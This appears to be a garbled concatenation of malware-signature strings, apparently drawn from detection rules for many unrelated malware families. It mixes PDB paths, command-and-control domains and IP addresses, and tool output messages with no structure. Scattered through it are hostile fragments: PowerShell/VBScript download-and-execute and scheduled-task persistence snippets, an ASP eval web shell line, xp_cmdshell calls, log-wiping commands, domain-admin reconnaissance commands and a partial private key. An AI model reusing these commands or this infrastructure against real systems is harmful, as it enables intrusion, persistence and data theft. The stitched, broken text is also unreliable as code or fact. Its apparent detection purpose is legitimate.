setx TOR_CONTROL_PASSWORDmitmproxy0\\insert_cert.exeelevator.dllfail adding certDownloadingFilefail adding cert: %sInternetOpenA failC:\\\\Windows\\\\Sysnative\\\\ntoskrnl.exe[*] traversing processes_getkprocess[*] LoaderConfig %ploader.objMozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3[*] token restoreelevator.obj_getexportthe file uploaded failed !the file downloaded failed !common.aspxweber_server.exed:\\Hellsing\\release\\msger\\d:\\hellsing\\sys\\xrat\\D:\\Hellsing\\release\\exe\\d:\\hellsing\\sys\\xkat\\e:\\Hellsing\\release\\claree:\\Hellsing\\release\\irene\\d:\\hellsing\\sys\\irene\\msger_server.dllcmd.exe /c ping 127.0.0.1 -n 5&cmd.exe /c del /a /f \"%s\"xweber_install_uac.exes
S11SWFOrVwR9UlpWRVZZWAR0U1aoBHFTUl2oU1Y=S11SWFOrVwR9dnFTUgRUVlNHWVdXBFpTVgRdUlpWRVZZWARdUqhZVlpFR1kEUVNSXahTVgRaU1YEUVNSXahTVl1SWwRZValdVFFZUqgQBF1SWlZFVllYBFRTVqg=" $a6="7dqm2ODf5N/Y2N/m6+br3dnZpunl44g=vd/m7OXd2ai/5u7a59rr7Ki45drcqMPl5t/c5dqIZw==v
msger_install.dll
ex.dll
PROXY_INFO: automatic proxy url => %s PROXY_INFO: connection type => %d PROXY_INFO: proxy server => %s PROXY_INFO: bypass list => %s InternetQueryOption failed with GetLastError() %dD:\\Hellsing\\release\\exe\\exe\\\\Dbgv.sysXKAT_BINrelease sys file error.driver_load error. driver_create error.delete file:%s error.delete file:%s ok.kill pid:%d error.kill pid:%d ok.-pid-deletekill and delete pid:%d error.kill and delete pid:%d ok.%s\\system\\%d.txt_msgerhttp://%s/lib/common.asp?action=user_login&uid=%s&lan=%s&host=%s&os=%s&proxy=%shttp://%s/data/%s.1000001000/lib/common.asp?action=user_upload&file=\
common_loadDriver CreateFile error! common_loadDriver StartService error && GetLastError():%d! i
aPLib v0.43 - the smaller the bettermsrv.dll
DllASPXSpyIIS Spyprotected void DGCoW(object sender,EventArgs e)openmydoorInstall service errorstart remove serviceNdisVersionUnable to alloc the adapter!Wait for master fuckxx.exe <HOST> <PORT>chkroot2007Door is bind on %sMicrosoft.Exchange.Clients.Auth.dllDllshellexc2010Users\\ljw\\Documentsplease input pathauth.owa\\DnsTunClient\\\\t-DNSTunnel\\xssok.blogspotdnstunclientbecause of error, can not analysiscan not deal witn the errorthe other retun one RSTCoversation produce one errorProgram try to use the have deleted the bufferEFH3 [HEX] [SRCFILE] [DSTFILE]123.EXE 123.EFHENCODER: b[i]: = (LUID ERROR)Users\\K8team\\Desktop\\GetPasswordDebug x64\\GetPassword.pdbgetuserinfo usernamejoe@joeware.netIf . specified for userid,Game Over Good Luck By WindReleiceNamejingtisanmenxiachuanxiao.vbsWinds Updategtalklite.comcomputer=%s&lanip=%s&uid=%s&os=%s&data=%sD13idmAdmError: PeekNamedPipe failed with %i.dllUT.exeUT.urlUTlisten SOCKET error.WSAAsyncSelect SOCKET error.new SOCKETINFO error!Http/1.1 403 ForbiddenCreate SOCKET error.This service can't be stoped.Provides support for media palyerCreaetProcess Error%4.2f GBDos Emluator Ver\\PIPE\\FASTDOSFastDos.cppfail,error code = %d.SAFEPROXY HTServerTimer Quit!Useage: %s pid%s PORT[%d] TO PORT[%d] SUCCESS!p0: port for listener\\users\\whg\\desktop\\plug\\[+Y] cwnd : %3d, fligth:\\UnitFrmManagerKeyLog.pas\\UnitFrmManagerRegister.pasInput Name...New Value#TThreadRControl.Execute SEH!!!\\UnitFrmRControl.pasOnSocket(event is error)!Make 3F Version Ok!!!PELEASE DO NOT CHANGE THE DOCAMENTPress [Ok] Continue Run, Press [Cancel] ExitFail To Load LSASRVUser PrincipalRING RAT Exception(can not update server recently)!Sucess!user canceled!Temp Result File , Change it to where you likeBy. Twi1ight[both mode] ,delay TIME to read resultsuch as nc.exe or Trojan+++shell mode+++win2008 fso has no privilege to delete filednstunclient -d or -domain <domain>dnstunclient -ip <server ip address>C:\\Windows\\System32\\cmd.exe /C schtasks /create /tn \"\\Microsoft\\Windows\\PLA\\System\\Microsoft Windows\" /tr C:\\Windows\\System32\\cmd.exe /C schtasks /create /tn \"Microsoft Windows\" /tr taskkill /im conime.exe\\dns control\\t-DNSTunnel\\DnsTunClient\\DnsTunClient.cppUDP error:can not bing the port(if there is unclosed the bind process?)use error domain,set domain pls use -d or -domain mark(Current: %s,recv %s)error: packet num error.the connection have condurt,pls try laterCoversation produce one error:%s,coversation failtry to add many same pipe to select group(or mark is too easy).a
get_BadLoginAddressget_LastFailedLoginADS_UF_ENCRYPTED_TEXT_PASSWORD_ALLOWEDget_PasswordExpirationDateBin_ExecSql(\"exec master..xp_cmdshell'bcp \\\"select safile from \" + db + \"..bin_temp\\\" queryout \\\"\" + Bin_TextBox_SavePtc.Text=\"<a href=\\\"javascript:Bin_PostBack('zcg_ClosePM','\"+Bin_ToBase64(de.Key.ToString())+\"')\\\">Close</a>\";Bin_ExecSql(\"IF OBJECT_ID('bin_temp')IS NOT NULL DROP TABLE bin_temp\");-slave <ConnectHost> <ConnectPort> <TransmitHost> <TransmitPort>[+] Make a Connection to %s:%d....cmshared_get_ptr_from_atom_cmshared_get_ptr_from_atom[-] TransmitPort invalid.[+] Waiting for Client on port:%d ......\\setup.exemsi.dll.urlUTmsi.dllUTsetup.exeUT/c del /q %sP
PluginDeflaterCompressionModeSystem.IO.CompressionT
Zcg.Test.AspxSpyPluginsTestPlugin{\rt01{\rtxa3John Doeauthor StoneContent-Disposition: form-data; name=\"m1.jpg\"C
IEComDll.datC
network.proxy.socks_port\", I am AdminI am UserRun install success!Service install success!Something Error!Not Configed, Exiting$login$$sysinfo$$shell$$fileManager$$fileDownload$$fileUpload$*
Error2Can't find [%s]!Check the file name and try again!Open [%s] error! %dThe Size of [%s] is zero!CreateThread DownloadFile[%s] Error!UploadFile [%s] Error:Connect Server Failed!Receive [%s] Error(Recved[%d] != Send[%d])!Receive [%s] ok! Use %2.2f seconds, Average speed %2.2f k/sCreateThread UploadFile[%s] Error!Ready Download [%s] ok!Get ControlInfo from FileClient error!FileClient has a error!VirtualAlloc SendBuff Error(%d)ReadFile [%s] Error(%d)...ReadFile [%s] Data[Readed(%d) != FileSize(%d)] Error...RecvData MyRecv_Info Size Error!RecvData MyRecv_Info Tag Error!SendData szControlInfo_1 Error!SendData szControlInfo_3 Error!VirtualAlloc RecvBuff Error(%d)RecvData Error!WriteFile [%s} Error(%d)...SystemVersion:    %sProduct  ID:      %sInstallPath:      %sInstallTime:      %d-%d-%d, %02d:%02d:%02dResgisterGroup:   %sRegisterUser:     %sComputerName:     %sWindowsDirectory: %sSystem Directory: %sNumber of Processors:       %dCPU[%d]:  %s: %sMHzRAM:         %dMB Total, %dMB Free.DisplayMode: %d x %d, %dHz, %dbitUptime:      %d Days %02u:%02u:%02u\
LoaderDLL.dll{5947BACD-63BF-4e73-95D7-0C8A98AB95F2}\
0SSSSS4412021002050WWWWWvoicemailadobe.exeE
Wscript.Sleep 5000Set FSO = CreateObject(\"Scripting.FileSystemObject\")If(FSO.FileExists(\"then FSO.DeleteFile(\".\\/result?hl=en&id=%s
{mauthor usertitle Vjkygdjdtyujcompany ooocreatim\\yr2012\\mo4\\dy19\\hr15\\min10password 00000000
NSCortr.dllNSCortr1.dllSina.exeWrite file Ok...ERROR: Can not open socket....Error in parametrs:Usage: @<get/put> <IP> <PORT> <file>ERROR: Not connect...Connect successful....clnt <%d> rqstd n ll kllclnt <%d> rqstd swapcld nt sgnl prcs grpcld nt sgnl prntork error/var/tmp/gogomyfilename= |%s|mypid,mygid=mypid=|%d| mygid=|%d|/var/tmp/taskmydevname= |%s|
IVnuk: %dSyn: %d%s
./a filename template_fileMay be %s is empty?template string = |%s|No blocks !!!No data in this block !!!!!!No good lineLog ended at => %sLog started at => %s [pid %d]/var/tmp/taskhostmy hostname: %s/var/tmp/tasklog/var/tmp/.Xtmp01myfilename=-%s-/var/tmp/taskpidmypid=-%d-/var/tmp/taskgidmygid=-%d-G
"*m>9,stack = 0x%x, targ_addr = 0x%xexecl failedHiding complit...nusage: %s <username> <fixthings> [hostname]ls -la %s* ; /bin/cp  ./wtmp.tmp %s; rm  ./wtmp.tmpERROR: Unlinking tmp WTMP file.USAGE: wipe [ u|w|l|a ] ...options...Erase acct entries on tty :   wipe a [username] [tty]Alter lastlog entry       :   wipe l [username] [tty] [time] [host]%%APPDATA%%\\Microsoft\\wuauclt\\wuauclt.datMozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)/news/show.asp?id%d=%d0l23kj@nboxu%%s.asp?id=%%d&Sid=%%dUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SP Q%%d)Cookies: UseID=KGIOODAOOK%%s<!--
cWKQmZlaVVVVVVVVVVVVVcwSdcjKz85m7JVm7JFxkZmZmRDcZXAsmZmZzBJ1ys/O
Get-Content $env:Public\\Libraries\\update.vbs) -replacewss.Run \"powershell.exe \" & Chr(34) & \"& {waitfor haha /T 2}\" & Chr(34), 0Call Extract(UpdateVbs, wss.ExpandEnvironmentStrings(\"%PUBLIC%\") & \"\\Libraries\\update.vbs\")CreateObject(\"WScript.Shell\").Run cmd, 0oJGdsb2JhbDpteWhvc3QgPSE9NRT0iJXB1YmxpYyVcTGlicmFyaWVzXU2V0IHdzcyA9IENyZWF0ZU9iamVjdCgid1NjcmlwdC5TaGVJHNjcmlwdGRpciA9IFNwbGl0LVBhdGggLVBhcmVudCAtUGF0aCADQpTZXQgd3NzID0gQ3JlYXRlT2JqZWNd2hvYW1pICYgaG9zdG5hbDownloadExecute=\"powershell \"\"&{$r=Get-Random;$wc=(new-object System.Net.WebClient);$wc.DownloadFile(-ExecutionPolicy Bypass -File \"&HOME&\"dns.ps1\"CreateObject(\"WScript.Shell\").Run Replace(DownloadExecute,\"-_\",\"bat\")CreateObject(\"WScript.Shell\").Run DnsCmd,0http://winodwsupdates.me%userprofile%\\AppData\\Local\\Microsoft\\ $fdn=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('&{$rn = Get-Random; $id = 'TR') -replace '__',('DNS'+$id) | \\upd.vbsschtasks /create /F /sc minute /mo ') -replace '__',('HTP'+$id) | &{$rn = Get-Random -minimum 1 -maximum 10000; $id = 'AZhttp://www.israirairlines.com/?mode=page&page=14635&lang=eng<source code from https://www.fireeye.com/blog/threat-research/2016/05/targeted_attacksaga.htmlrrrr\\Libraries\\fireueye.vbs\
wss.Run \"powershell.exe \" & Chr(34) & \"& {(Get-Content $env:Public\\Libraries\\update.vbs) -replace '__',(Get-Random) | Set-Cm
Call Extract(DnsPs1, wss.ExpandEnvironmentStrings(\"%PUBLIC%\") & \"\\Libraries\\dns.ps1\")2
whoami & hostname & ipconfig /allnet user /domain 2>&1 & net group /domain 2>&1net group \"domain admins\" /domain 2>&1 & (Get-Content $env:Public\\Libraries\\dns.ps1) -replace ('#'+'##'),$botid | Set-Content $env:Public\\Libraries\\dns.ps1Invoke-Expression ($global:myhome+'tp\\'+$global:filename+'.bat > '+$global:myhome+'tp\\'+$global:filename+'.txt')('00000000'+(convertTo-Base36(Get-Random -Maximum 46655)))flash.Media.Sound()call Kernel32!VirtualAlloc(0x1f140000hash$=0x10000hash$=0x1000hash$=0x40){4D36E972-E325-11CE-BFC1-08002BE10318}NetStreamzhoupin exploit crewzhopin exploit crewBackDoorLoggerzhuAddresspcap_dump_openResolving IPs to poison...WARNNING: Gateway IP can not be found%s-%02d%02d%02d%02d%02d.rC:\\Users\\%s\\AppData\\Cookies\\N
Net ServiceShellCreator2.Propertiesset_IVSmartCopy2.PropertiesZhuFrameWorkUnable to resolve [ %s ]. ErrorCode %dyour target's IP is : %sRaw TCP Socket Created successfully.N
TinyZBot.Properties.Resources.resourcesAoao WaterMarkRun_a_exenetscp.exeget_MainModule_WebReference_DefaultWSremove_CheckFileMD5Completedhttp://tempuri.org/Zhoupin_CleavergetShadyProcessgetSystemAntivirusesAntiVirusDetectorCOM+ System Extentionscsext.exeCOM_Extentions_binkill command is in last machine, going backmessage data length in B64: %d BytesmimikatzWrapperget_mimikatzLAST_TIME=00/00/0000:00:00PM$if %%ERRORLEVEL%% == 1 GOTO lineN
Content-Disposition: inline; comp=%s; account=%s; product=%d;zhCat -l -h -tp 1234A
zhLookUp.PropertiesMimikatzRunnerzhmimikatzZh0uSh311your target
s IP is : %sMozilla/4.0 ( compatible; MSIE 7.0; AOL 8.0 )Users\\parviz\\documents\\UserName=User-001Web=1Mail=1FTP=0IPAddressLow=78.109.194.1143.03
ShellExecuteW
HttpQueryInfoA
^B*stype=info&data=?mmid=&status=run succeed_KB10B2D1_CIlFD2C
eroqw112sfsdfRtlDecompressBuffers
Shell32.dll
F:\\Excalibur\\Excalibur\\Excalibur\\bin\\oSaberSvc.pdbcmd.exe /c MD h
Internet Connect Failed!WOODTALE TECHNOLOGY INCFlyingbird Technology LimitedNeoact Co., Ltd.AmazGame Age Internet Technology Co., LtdEMG Technology LimitedZemi Interactive Co., Ltd337 Technology LimitedRunewaker Entertainment0ncProxyXllUniscribe.dllWS2_32.dllJDNSAPI.dllx64.datLSpyb2Excalibur\\bin\\Shell.pdbB
2OLE32.DLLl
!This is a Win32 program.QWNjZXB0OnVXNlci1BZ2VudDogTdGFzay5kbnME3luLmNN
ncircTMPg~SHELL#N.adobe.xmNEL32.DLLB
|xtplhdS
www.micro1.zyns.comMozilla/4.0 (compatible; MSIE 8.0; Win32)m
C:\\Users\\cmd\\Desktop\\msacm32\\Release\\msacm32.pdbp
CraatePipea
are you there!@#$%^&*()_+.hotp1
AVCObfuscation
AVCSetiriControl
POLL_RATEOP_TIME(end hour)%d:TCP:*:Enabled%s[PwFF_cfg%d]Fake_GetDlgItemTextW: ***value***=
PasswordChangeNotifyVPLRXZHTUdog2j~lDqpqftk(Wou\"Isztk)StartThreadAtWinLogon<
OUEMM/EMM
++[%s^^unknown^^%s]++vtfs43/emm3
mGetInstanceW
%d) Command:%s
-----	------
jMyFileMappingObject[
Connected [%s:%d]...reuse possible: %c] => %d%%\x0ac:\\winnt\\system32\\cmd.exec:\\windows\\system32\\cmd.exec:\\windows\\command.comcopy \"%s\" \"%s\" /Yhttp://%s/files/\"%s\". %s: \"%s\".0x0666----------------This_is_a_boundary$Server 2012Server 2008Server 2003net.exe group \"Domain Admins\" /domainnet.exe group \"Admins. do Dom(SVRID=%d)(TG=%d)(SVR=%s)net.exe localgroup Administradoresc:\\cmd32dll.exe{\\*\\generator Msftedit 5.41.Attachment 1: Complete Professional BackgroundE-mail:  \\cf1\\ul\\f1Education:\\parK
?AVCinj2008Dlg@@?AVCinj2008App@@mp.dll
Starting
hlpuctf.dll
kl.dll
Starting
iomus.dll
Startingatiml.dll
KickInPointsnm.dll
GetReadyForDeadscrsh.dll
GetReadyForDeadPRU\
^J`JUUNSXK
^JUR]N[J]
^J`JUUNa
ZxWinDeffContexP
A95BL765MNG2GPRSh
hauthuid.dll[roboconid][%s][objectset][%s]r
%s%02d.%02d.%02d_%02d.%02d.%02d.skw%
:\\!PROJECTS!\\Mina\\2015\\\\PZZ\\RMO\\:\\work\\PZZC:\\Users\\mlk\\:\\W o r k S p a c e\\D:\\My\\Projects_All\\2015\\\\TOOLS PZZ\\Bezzahod\\IntelRestoreR
rsfvxd.dattsb386.datfrmmlg.datsmdhost.dllK
app.stream-media.netFile %s does'nt exist or is forbidden to acess!GetProcessAddresss of pHttpQueryInfoA Failed!Connect %s error!Download file %s successfully!index.tmpExecute PE Successfullyaa/22/success.xmlaa/22/index.aspFile %s a Non-Pe FileSendRequset error!filelist[%d]=%shttp://update.konamidata.com/test/zl/sophos/td/result/rz.dat?http://update.konamidata.com/test/zl/sophos/td/index.dat?Internet connect error:%dProxy-Authorization:BasicHttpQueryInfo failed:%dread file error:%ddowndll.dllInvalid urlCreate file failedmyAgent%s%s%d%dAvaliable data:%u bytesThe procedure entry point %s could not be located in the dynamic link library %spsapi.dllWinHttpGetProxyForUrlW
%s\\tmp%d.exeM
InternetQueryOptionAWNetEnumResourceAHttpSendRequestExAPSAPI.DLLM
CreatePipeEnumProcessModules%s%duserid=%dthreadid=%dgroupid=%dssdpsvc.dllFail %s LsaServiceInit%-8d Fs %-12s Bs m
msupdater.exemsupdater32.exem
msupdate.pif_
_msupdate_/
Explorer.exe \"FAVORITES.DATCOMSPECA
VirtualProtectExInvalid parameterwinsta0\\defaultEXPLORER.EXECreateProcessAsUserAHttpEndRequestAGetModuleBaseNameAGetModuleFileNameExAEnumProcessesSPSSSQProxy-Authorization:Basic kPStoreCreateInstanceFeb 04 2015I can not start %sdwConnectPortdwRemoteLanPortstrRemoteLanAddressstrLocalConnectIp\
__msgid=__serial=O
clientpath=serverpath=MZ
!This program cannot be run in DOS mode.a
h.dataLRich6KeServiceDescriptorTableH.dataINIT_snprintf_except_handler3mbstowcswcstombsKeGetCurrentIrqlwcscpyZwCreateFileZwQueryInformationFilewcslenatoi5
PADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGU
0RichwService Control Manager_vsnwprintfRoot AgencyRoot Agency0StartServiceCtrlDispatcherA\
Getting PortName/Identifier failed - %xSerialAddDevice - error creating new devobj [%#08lx]External Naming Failed - Status %x------- Same multiport - different interrupts%x occurred prior to the wait - starting the'user registry info - userPortIndex: %dCould not report legacy device - %xentering SerialGetPortInfo'user registry info - userPort: %xIoOpenDeviceRegistryKey failed - %x Kernel debugger is using port at address %XRelease - freeing multi contextSerial driver will not load port'user registry info - userAddressSpace: %dSerialAddDevice: Enumeration request, returning NO_MORE_ENTRIES'user registry info - userIndexed: %d\
IoGetRelatedDeviceObject\\Registry\\Machine\\System\\CurrentControlSet\\ServicesPsGetCurrentProcessId\
KeSetImportanceDpcKeQueryPerformanceCounterKeInitializeEventKeInitializeTimerExExReleaseFastMutexUnsafeExAcquireFastMutexUnsafe
VMEM.sysR
ntkrnlpa.exeIoGetDeviceObjectPointerM
IoWriteErrorLogEntryKeRemoveEntryDeviceQueueSeSinglePrivilegeCheckIoBuildDeviceIoControlRequestKeRemoveDeviceQueueIofCompleteRequestKeInitializeSpinLockMmIsNonPagedSystemAddressValidIoCreateDeviceKefReleaseSpinLockFromDpcLeveld
disp.dll%x:%x:%x:%x:%x:%x:%x:%x%c%d.%d.%d.%d%c%hd %dsharepwreglistlogdumpN
Phys Avail:p
millisecsAuthenticateNetUseIpcFailed to authenticate toFailed to disconnect from%
Not deleting...CopyServiceToRemoteMachineDH Exchange failedConnectToNamedPipes3
StackWalk64PRIVHEAD\\\\.\\PhysicalDrive%dCreateNamedPipeWSetSecurityDescriptorDaclGetOverlappedResultTerminateThread%
EFEB0A9C6ABA4CF5958F41DB6A31929776C643DEDC65CC9B67AB8B0066FF2492\\Device\\NdisRaw_\
DMWndClassX%d{774476DF-C00F-4e3a-BF4A-6D8618CFA532}{820C02A4-578A-4750-A409-62C98F5E9237}
gk%1_slocal t = w.exec2str(\"regedit local r = w.exec2str(\"catap*.txt link*.txt node*.tun VirtualEncryptedNetwork.licencemove O FakeVirtualEncryptedNetwork.dllsinfo | basex b 32url | dext l 30w.exec2str(execStr)netnfo irc | basex b 32urlw.exec(\"wfw status\")exec(\"samdump\")cat VirtualEncryptedNetwork.ini|grepif string.lower(k) == \"securityproviders\" thenexec2str(\"plist b | grep netsvcs\").*account.*|.*acct.*|.*domain.*|.*login.*|.*member.*SAURON_KBLOG_KEY =Resolve hosts that answerPrint only replying IpsDo not display MAC addressesInject using process name or pid. DefaultConvert mode: Read log from file and convert to textMaximum running time in seconds64, 64url, 32, 32url or 16.Force decoding when input is invalid/corruptThis cruftAssemble rows of DNS names back to a single string of dataremoves checks of DNS names and lengths (during split)Randomize data lengths (length/2 to length)n
\\*\\3vpnU
ExampleProject.dll
Hincorrect header checkMSAOSSPC.dllM
$IP_PADDING_DATAPORT_NUMbpython27.dllemail.header(L
Crypto.Cipher.AES(mod is NULL - %sFindNextFile
admin\\Desktop\\Babar64\\Babar64\\obj\\DllWrapperUser-Agent: Mozilla/4.0 (compatible; MSI 6.0;ExecQueryFailled!NBOT_COMMAND_LINE!!!EXTRACT ERROR!!!File Does Not Exists-->[%s]/s /n %s \"%s\"%%WINDIR%%\\%s\\%s/c start /wait (D;OICI;FA;;;AN)(A;OICI;FA;;;BG)(A;OICI;FA;;;SY)(A;OICI;FA;;;LS)SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\%COMMON_APPDATA%CONOUT$DLLPATH:\\PROJECT\\XAPS_XAPS_OBJECTIVE.dll" $variant12 = "startUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:28.0) Gecko/20100101 Firefox/28.0is you live?176.31.112.10error in select, errno %d" $mix3 = "no msgerr %di`m waitOpenSSL 1.0.1e 11 Feb 2013" $mix10 = "Xtunnel.exe\\\\.\\pipe\\ahexecimplevelPROJECT\\XAPS_OBJECTIVE_DLL\\.?AVAgentModuleRemoteKeyLogger@@<font size=4 color=red>process isn't exist</font>.winnt.check-fix.com.update.adobeincorp.com.microsoft.checkwinframe.coma
for %%G in (.pdf, .xls, .xlsx, .doc, .docx) do (cmd /c copyforfilesYour command not writed to pipeTerminal don`t started for executing commandCommand will have end with \\nWantedBy=multi-user.target' >> /usr/lib/systemd/system/Success execute command or long for waiting executing your commandls /etc | egrep -e\"fedora*|debian*|gentoo*|mandriva*|mandrake*|meego*|redhat*|lsb-*|sun-*|SUSE*|release\"rm -f /usr/lib/systemd/system/ExecStart=<table><caption><font size=4 color=red>TABLE EXECUTE FILES</font></caption>RemoteShellbasic_string::_M_replace_dispatchclconfg.dllA
DGMNOEP/%s%s%s/?%s=Control Panel\\Dehttps=https://%snetwork.proxy.ht2http=http://%s:%Control Panel\\Denetwork.proxy.ht&ol1mS9c
%s <proxy ip> <proxy port> <target ip> <target port> <cmd> [arg1 cmd] ... [argX cmd][-] Error in connection() %d - %s[-] Child process exit.POST http://%s:%s/ HTTP/1.1pipe() topipe() fromMIIEpQIBAAKCAQEA4lSvv/W1Mkz38Q3z+EzJBZRANzKrlxeE6/UXWL67YtokF2nNiAeS3CCA4wli6+9CIgX8SAiXd5OezHvI1jza61z/flsqcC1IP//gJVt16nRx3s9z%WINDIR%\\ativpsrz.bin%WINDIR%\\ativpsrn.bink
KERBEROS64.dllkerberos%d.dll\\\\.\\pipe\\lsasspLSASS secure pipeNullSessionPipesstartlogstoplogUnsupported OS (%d)Unsupported OS (%s)zeSecurityDescriptorSpGetInfoSpShutdownu
http://www.jmicron.co.tw0SUCKM3 FROM EXPLORER.EXE MOTH4FUCKA #@!\
http://www.realtek.com0{
\\objfre_w2k_x86\\i386\\guava.pdbM
view MCPVREADVARPERCON as select VARIABLEID,VARIABLETYPEID,FORMATFITTING,SCALEID,VARIABLENAME,ADDRESSPARAMETER,PROTOKOLL,MAXLIMIS
[%d] Offset can not fetched.P
IJKLlGdmaWhram0vn36BgIOChYR3L45xcHNydXQvhmloa2ptbH8voYCDTw==EFGHlGdmaWhrL41sf36BgIOCL6R3dk8=cmd.exe /q /c \"%s\"\\\\.\\pipe\\%s%s%dThis is a service executable! Couldn't start directly.\\\\.\\pipe\\TermHlp_communicatonTermHlp_stdoutTermHlp_stdinsvchostdllserver.dllSvcHostDLL: RegisterServiceCtrlHandler %S failed\\nbtstat.exeDataVersionExLpykh~mzCCRv|mplpykCCHvq{phlCC\\jmmzqkIzmlvpqCCL$,PQR0/0B0H0Q0W0k0QSUVWhHt Hu[1001=cmd.exe1003=ShellExecuteA1002=/c del /q %s1004=SetThreadPriorityssonsvr.exeUTnavlu.dllUT@
VPDN_LU.exeUTpnipcn.dll.urlUTldvpreg.exeUT
set cmd : %s\
NvSmartMax.dll.urlNv.exeCryptProtectMemory failedCryptUnprotectMemory failedr
navlu.dll.urlUTpnipcn.dllUT\\ssonsvr.exe
\"cmd\" /c cd /d \"c:\\Windows\\Temp\\\"&copysvchost.exe a -k -r -s -m5 -v1024000 -padmin-windows2014ren *.rar *.zipc:\\temp\\ipcan.exe<%eval(Request.Item(\"admin-na-google123!@#api.apigmail.combackup.darkhero.orgbel.updatawindows.combinary.update-onlines.orgblackcmd.comcastle.blackcmd.comctcb.blackcmd.comdav.local-test.comtest.local-test.comdev.local-test.comocean.local-test.comga.blackcmd.comhelpdesk.blackcmd.comhelpdesk.csc-na.comhelpdesk.hotmail-onlines.comhelpdesk.lnip.orgjobs.hotmail-onlines.comjustufogame.comlogin.hansoftupdate.comlong.update-onlines.orglonglong.update-onlines.orglongshadow.dyndns.orglongshadow.update-onlines.orglongykcai.update-onlines.orglostself.update-onlines.orgmac.navydocument.commail.csc-na.commantech.updatawindows.commicr0soft.orgmicrosoft-outlook.orgmtc.navydocument.commtc.update-onlines.orgnews.hotmail-onlines.comoac.3322.orgocean.apigmail.compchomeserver.comregistre.organiccrap.comsecurity.pomsys.orgservices.darkhero.orgsgl.updatawindows.comsonoco.blackcmd.comtest.logmastre.comup.gtalklite.comupdate.deepsoftupdate.comupdate.hancominc.comupdate.micr0soft.orgupdate.pchomeserver.comurs.blackcmd.comwang.darkhero.orgwebs.local-test.comword.apigmail.comwordpress.blackcmd.comworking.blackcmd.comworking.darkhero.orgworking.hotmail-onlines.comwww.trendmicro-update.orgwww.update-onlines.orgx.apigmail.comykcailostself.dyndns-free.comykcainobody.dyndns.orgzj.blackcmd.comlaxness-lab.comgoogle-ana1ytics.comwww.google-ana1ytics.comftp.google-ana1ytics.comhotmailcontact.net208.115.242.36208.115.242.37208.115.242.3866.63.178.14272.11.148.22072.11.141.13374.63.195.23674.63.195.23774.63.195.238103.24.0.142103.24.1.54106.187.45.162192.151.236.138192.161.61.19192.161.61.20192.161.61.2267.215.232.17996.44.177.19549.143.192.22167.215.232.18167.215.232.18296.44.182.24396.44.182.24596.44.182.24649.143.205.30working_success@163.comykcaihyl@163.comyuming@yinsibaohu.aliyun.comSVCHostServiceDll.dllm
ModStartModStoptoo long data for this type of transportnot enough server resources to complete operationTask not execute. Arg file failed.Global\\MSCTF.Shared.MUTEX.ZRXpeer has closed the connectiontcpdump.exewindump.exedsniff.exeethereal.exesnoop.exeettercap.exeminiport.datnet_password=%sInternal command not support =((L|-1|AS_CUR_USER:OpenProcessToken():%d, %s|L|-1|CreateProcessAsUser():%d, %s|L|-1|AS_CUR_USER:LogonUser():%d, %s|L|-1|try to run dll %s with user priv|\\\\.\\Global\\PIPE\\sdlrpc\\\\%s\\pipe\\comnodePlugin dll stop failed.AS_USER:LogonUser():%dM
msimghlp.dllximarsh.dllmsximl.dllINTERNAL.dllieuser.exe\\\\.\\pipe\\sdlrpcWaitMutex Abandoned %pOPER|Wrong config: no port|OPER|Wrong config: no lastconnect|OPER|Wrong config: empty address|Trans task %d obj %s ACTIVE fail robj %sOPER|Wrong config: no auth|OPER|Sniffer '%s' running... ooopppsss...|SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\5.0\\User Agent\\Post PlatformSOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\5.0\\User Agent\\Pre Platformwww.yahoo.comM
www.bing.com%s: http://%s%s/javascript/view.phpTask %d failed %s,%dMozilla/4.0 (compatible; MSIE %d.0; [CONFIG]name = exe = cmd.exe\\Cobra\\Release\\Cobra.pdb[NAME]object_id=[TIME][CW_LOCAL]system_pipeuser_pipe[TRANSPORT]run_task_system[WORKDATA]address1spstatusadaptablepost_fragpfsgrowperiodMicrosoft-Windows-Security-Auditing4688AppData\\Local\\Temp\\rsys.exe7036RPC Endpoint Locator7045user mode serviceauto startg
POST http://%s:%d/aspxabcdefg.asp?%s HTTP/1.1GET http://%s:%d/aspxabcdef.asp?%s HTTP/1.1s
User-Agent: NetscapeA
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-EN; rv:1.7.12) Gecko/20100719 Firefox/1.0.7%
/%d%s%d%
GET %dHTTP/1.1POST http://%ws:%d/%d%s%dHTTP/1.1PeekNamePipeNormal.dotR_eOR_eOR_eO)CiOS_eOD
%s %s %s %s %d %d %d %d %ProgramFiles%\\Internet Explorer\\iexplore.exemsictl.exe127.0.0.1:8080mshtml.datmsisvc-GetModuleFileNameExW:
dwError1 = %d*
GET http://%ws:%d/%d%s%dHTTP/1.1J:\\chong\\S
J:\\chong\\nod\\Release\\SslMM.exen
Host: %ws:%dSCHANNEL.DLL\\Microsoft\\Internet Explorer\\conhost.exe\\Microsoft\\Internet Explorer\\dll2.xor\\Microsoft\\Internet Explorer\\HOOK.DLL\\Microsoft\\Internet Explorer\\main.dll\\Microsoft\\Internet Explorer\\nvsvc.exe\\Microsoft\\Internet Explorer\\SBieDll.dll\\Microsoft\\Internet Explorer\\mon\\Microsoft\\Internet Explorer\\runas.exeSOFTWARE\\360Safe\\LiveupSoftware\\360safeSOFTWARE\\kingsoft\\AntivirusSOFTWARE\\Avira\\Avira DestopSOFTWARE\\rising\\RAVSOFTWARE\\JiangMinSOFTWARE\\Micropoint\\Anti-Attackf
h31415927ttttS
M&GX^DSF&DA@Fsafetyssl.security-centers.comwthkdoc0106test-b7fa835a39/%s?rank=%sModuleStart\x00ModuleStop\x00start1156fd22-3443-4344-c4ffffread\x20file\x2E\x2E\x2E\x20error\x00\x00
4HAL.dll
